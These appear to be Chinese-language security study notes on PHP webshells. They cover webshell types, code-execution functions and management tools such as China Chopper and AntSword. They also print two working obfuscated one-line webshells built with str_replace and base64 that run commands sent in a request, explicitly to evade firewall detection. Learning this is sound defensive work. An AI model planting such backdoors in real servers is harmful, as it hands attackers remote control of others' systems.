一、webshell介绍(网页木马)
分类:
大马:体积大、隐蔽性差、功能多
小马:体积小,隐蔽强,功能少
一句话木马:代码简短,灵活多样
二、一句话木马:
@:不显示函数错误信息
eval将一个满足php代码格式的字符串当作代码执行
执行代码函数:
eval、assert、preg_replace()、
create_function()、array_map()、
array_filter()
执行命令函数
system();
其他语言:
三、webshell管理工具:
中国菜刀、蚁剑
功能:
虚拟终端、文件管理、数据库管理、数据配置管理
四、webshell变形:
变形的目的:绕过防火墙的查杀
变形方法:(要会举一反三)
1、str_replace();
<?php
$a=str_replace("abc","","aabcsabcabsabceabcrt");
$a($_REQUEST[''cmd'']);
?>
2、base64_decode();
<?php
$a=base64_decode(''YXNzZXJ0'');
$a($_REQUEST[''cmd'']);
?>
3、“.”操作符
4、更换数据来源
creat_function()匿名函数
